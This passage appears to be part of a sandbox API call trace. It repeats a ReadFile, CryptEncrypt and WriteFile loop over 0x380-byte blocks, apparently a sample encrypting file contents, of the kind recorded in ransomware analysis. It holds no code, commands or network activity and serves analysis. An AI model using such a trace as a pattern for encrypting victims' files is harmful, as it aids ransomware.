pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.989] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.989] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.989] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.989] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.990] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.990] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.991] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.991] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.991] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.991] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.991] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.991] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.991] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.991] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.991] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.992] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.992] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.992] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.992] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.992] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.993] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.993] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.993] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.993] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.993] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.993] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.994] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.994] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.994] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.994] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.994] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.995] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.995] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.995] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.995] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.995] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.995] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.996] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.996] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 